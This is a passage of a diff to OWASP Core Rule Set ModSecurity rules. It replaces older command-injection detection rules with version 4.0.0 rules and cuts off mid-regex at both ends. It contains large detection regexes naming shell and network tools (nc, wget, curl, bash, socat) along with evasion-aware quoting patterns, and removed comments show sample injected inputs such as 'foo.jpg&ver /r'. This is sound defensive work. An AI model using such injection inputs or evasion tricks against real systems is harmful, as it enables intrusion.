t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ - "id:932105,\ +# This is the base Rule to prevent Unix Command Injection +# for prefix + more than 4 characters. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932235.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932235 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\v&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\v&\)<>\|]|nsible-playbook|pt(?:-get|itude[\s\v&\)<>\|])|r(?:ch[\s\v&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\v&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v&\)<>\|]|on(?:tab)?)|s(?:plit|vtool)|u(?:psfilter|rl[\s\v&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\v&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\v&\)<>\|]|grep|i(?:le(?:[\s\v&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\v&\)<>\|])|o(?:ld[\s\v&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\v&\)<>\|]|core|e(?:ni(?:e[\s\v&\)<>\|]|soimage)|tfacl[\s\v&\)<>\|])|hci|i(?:mp[\s\v&\)<>\|]|nsh)|r(?:ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|dconfig|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ke[\s\v&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\v&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\v&\)<>\|]|map|o(?:de[\s\v&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\v&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\v&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\v]|3?versions))|r(?:ak(?:e[\s\v&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\v&\)<>\|]|user)|nano|oute[\s\v&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap)[\s\v&\)<>\|]|c(?:hed|r(?:een|ipt)[\s\v&\)<>\|])|diff|e(?:(?:lf|rvice)[\s\v&\)<>\|]|ndmail|t(?:arch|env|facl[\s\v&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\v&\)<>\|]|u(?:f|tdown[\s\v&\)<>\|]))|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\v&\)<>\|])|mux|ouch[\s\v&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v&\)<>\|]|gr|mdiff|pw|rsh)|olatility[\s\v&\)<>\|])|w(?:a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ + "id:932235,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ @@ -151,182 +194,77 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# [ Windows command injection ] -# -# This rule detects Windows shell command injections. -# If you are not running Windows, it is safe to disable this rule. -# -# A command injection takes a form such as: -# -# foo.jpg&ver /r -# foo.jpg|ver /r -# -# The vulnerability exists when an application executes a shell command -# without proper input escaping/validation. -# -# To prevent false positives, we look for a 'starting sequence' that -# precedes a command in CMD syntax, such as: ; | & ` -# -# Anatomy of the regexp: -# -# 1. Starting tokens -# -# ; ;cmd -# \{ {cmd -# \| |cmd -# \|\| ||cmd -# & &cmd -# && &&cmd -# \n \ncmd -# \r \rcmd -# ` `cmd -# -# 2. Command prefixes -# -# ( (cmd) -# , ,cmd -# @ @cmd -# ' 'cmd' -# " "cmd" -# \s spacing+cmd -# -# 3. Paths -# -# [\w'\"\./]+/ /path/cmd -# [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd -# [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd -# -# 4. Quoting -# -# \" "cmd" -# \^ ^cmd -# -# 5. Extension/switches -# -# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. -# /b cmd/h -# -# An effort is made to combat evasions by CMD syntax; for example, -# the following strings are valid: c^md, @cmd, "c"md. ModSecurity -# has a t:cmdLine transformation built-in to deal with some of these, -# but unfortunately, that transformation replaces ';' characters (so -# we cannot match on the start of a command) and '\' characters (so we -# have trouble matching paths). This makes the regexp more complex. -# -# This rule is case-insensitive. -# -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* -# [regexp assembled from util/regexp-assemble/regexp-932110.txt] -# (?:\.[\"\^]*\w+)?\b" \ -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c[\"\^]*o[\"\^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\